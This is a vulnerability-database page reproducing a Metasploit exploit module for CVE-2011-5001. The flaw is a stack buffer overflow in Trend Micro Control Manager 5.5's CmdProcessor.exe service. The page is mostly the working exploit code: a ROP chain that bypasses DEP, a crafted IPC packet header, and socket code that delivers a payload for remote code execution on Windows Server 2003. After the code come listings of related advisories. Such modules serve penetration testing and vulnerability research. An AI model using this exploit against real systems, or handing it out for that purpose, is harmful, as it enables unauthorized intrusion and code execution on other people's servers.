Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormBluePACKETSTORM:110167
HistoryFeb 24, 2012 - 12:00 a.m.

TrendMicro Control Manager 5.5 Buffer Overflow

2012-02-2400:00:00
blue
packetstormsecurity.com
28

EPSS

0.945

Percentile

99.3%

JSON
`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "TrendMicro Control Manger <= v5.5 CmdProcessor.exe Stack Buffer Overflow",  
'Description' => %q{  
This module exploits a vulnerability in the CmdProcessor.exe component of Trend  
Micro Control Manger up to version 5.5.  
  
The specific flaw exists within CmdProcessor.exe service running on TCP port  
20101. The vulnerable function is the CGenericScheduler::AddTask function of  
cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,  
controlled data is copied into a 256-byte stack buffer. This can be exploited  
to execute remote code under the context of the user.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Luigi Auriemma', #Initial discovery  
'Blue', #Metasploit  
],  
'References' =>  
[  
['CVE', '2011-5001'],  
['OSVDB', '77585'],  
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-345/']  
],  
'Payload' =>  
{  
'BadChars' => "\x00",  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => 'process',  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[  
# TCM 5.5 cannot be installed in Win2k3 SP0-SP1, Win2k8, or XP  
'Windows 2003 Server SP2 (DEP Bypass)',  
{  
'Ret' => 0x666b34c8, # TMNotify.dll stack pivot  
'Offset' => 5000  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => "Dec 07 2011",  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(20101)  
], self.class)  
end  
  
def junk  
return rand_text(4).unpack("L")[0].to_i  
end  
  
def exploit  
  
#TmUpdate.dll  
rop_chain = [  
0x668074d4, # POP EDX # OR AL,0F6 # RETN  
0x3FCD0FFC, # Put 00001000 into edx  
0x667611b2, # ADD EDX,C0330004 # RETN 04  
0x667c99e7, # POP EBP # RETN [TmUpdate.dll]  
junk,  
0x667c99e7, # skip 4 bytes [TmUpdate.dll]  
0x667e3250, # POP EBX # RETN [TmUpdate.dll]  
0xffffffff, # NEG EBX  
0x6683ab64, # INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]  
0x6683ab64, # INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]  
0x6680a1d3, # POP EAX # RETN [TmUpdate.dll]  
0xffffffc0, # Value to negate, will become 0x00000040  
0x66812b53, # NEG EAX # RETN [TmUpdate.dll]  
0x667f030a, # MOV ECX,EAX # RETN [TmUpdate.dll]  
0x667d4c7c, # POP EDI # RETN [TmUpdate.dll]  
0x667e8003, # RETN (ROP NOP) [TmUpdate.dll]  
0x667d54d0, # POP ESI # RETN [TmUpdate.dll]  
0x667baf06, # JMP [EAX] [TmUpdate.dll]  
0x66833376, # POP EAX # RETN [TmUpdate.dll]  
0x6686115c, # ptr to &VirtualAlloc() [IAT TmUpdate.dll]  
0x6681ceb3, # PUSHAD # RETN [TmUpdate.dll]  
0x668382c3, # ptr to 'call esp' [TmUpdate.dll]  
].pack('V*')  
#rop chain generated by mona.py  
  
header = "\x00\x00"  
header << "\x13\x88" #size of buffer  
header << rand_text_alpha(9)  
header << "\x15\x09\x13" #opcode  
header << "\x00\x00\x00"  
header << rand_text_alpha(25)  
header << "\xFE\xFF\xFF\xFF" #in instruction #MOV EDI,DWORD PTR DS:[EAX+ECX] #ECX is our buffer and needs to be readable dword  
header << "\xFF\xFF\xFF\xFF" #after sum with EAX. Pointer from EAX increments by #LEA EAX,DWORD PTR DS:[EAX+EDI+4] and then is saved  
header << "\xFF\xFF\xF4\xFF" #and used again. We can essentially walk the loop which increments EBX by 1 until we get to 14 which leads  
header << "\xFF\xFF" #us to our vulnerable function  
header << rand_text_alpha(1) #align stack again for rop  
  
pay = rop_chain  
pay << make_nops(374 - rop_chain.length)  
pay << "\xeb\x04" #Short jmp 0x04  
pay << [target.ret].pack('V')  
pay << payload.encoded  
  
sploit = header  
sploit << pay  
  
filler = rand_text_alpha(target['Offset'] - (sploit.length))  
  
connect  
print_status("Sending request...")  
sock.put(sploit + filler)  
handler  
disconnect  
  
end  
  
end  
`

Related

checkpoint_advisories 1
prion 1
saint 4
seebug 1
openvas 1
cvelist 1
nvd 1
cve 1
nessus 1
metasploit 1
zdt 1
exploitdb 1
checkpoint_advisories
checkpoint_advisories
Trend Micro Control Manager CmdProcessor.exe AddTask Stack Buffer Overflow (CVE-2011-5001)
2012-04-16 00:00:00
prion
prion
Stack overflow
2011-12-25 01:55:00
saint
saint
Trend Micro Control Manager AddTask buffer overflow
2012-01-16 00:00:00
Trend Micro Control Manager AddTask buffer overflow
2012-01-16 00:00:00
Trend Micro Control Manager AddTask buffer overflow
2012-01-16 00:00:00
seebug
seebug
TrendMicro Control Manger &lt;= v5.5 CmdProcessor.exe Stack Buffer Overflow
2012-02-24 00:00:00
openvas
openvas
Trend Micro Control Manager 'CmdProcessor.exe' Buffer Overflow Vulnerability
2012-07-02 00:00:00
cvelist
cvelist
CVE-2011-5001
2011-12-25 01:00:00
nvd
nvd
CVE-2011-5001
2011-12-25 01:55:02
cve
cve
CVE-2011-5001
2011-12-25 01:55:02
nessus
nessus
Trend Micro Control Manager CmdProcessor.exe Remote Buffer Overflow
2011-12-09 00:00:00
metasploit
metasploit
TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow
2012-02-23 01:44:47
zdt
zdt
TrendMicro Control Manger <= v5.5 CmdProcessor.exe Stack BOF
2012-02-24 00:00:00
exploitdb
exploitdb
Trend Micro Control Manger 5.5 - &#039;CmdProcessor.exe&#039; Remote Stack Buffer Overflow (Metasploit)
2012-02-23 00:00:00

EPSS

0.945

Percentile

99.3%

JSON
Related for PACKETSTORM:110167
checkpoint_advisories1prion1saint4seebug1openvas1cvelist1nvd1cve1nessus1metasploit1zdt1exploitdb1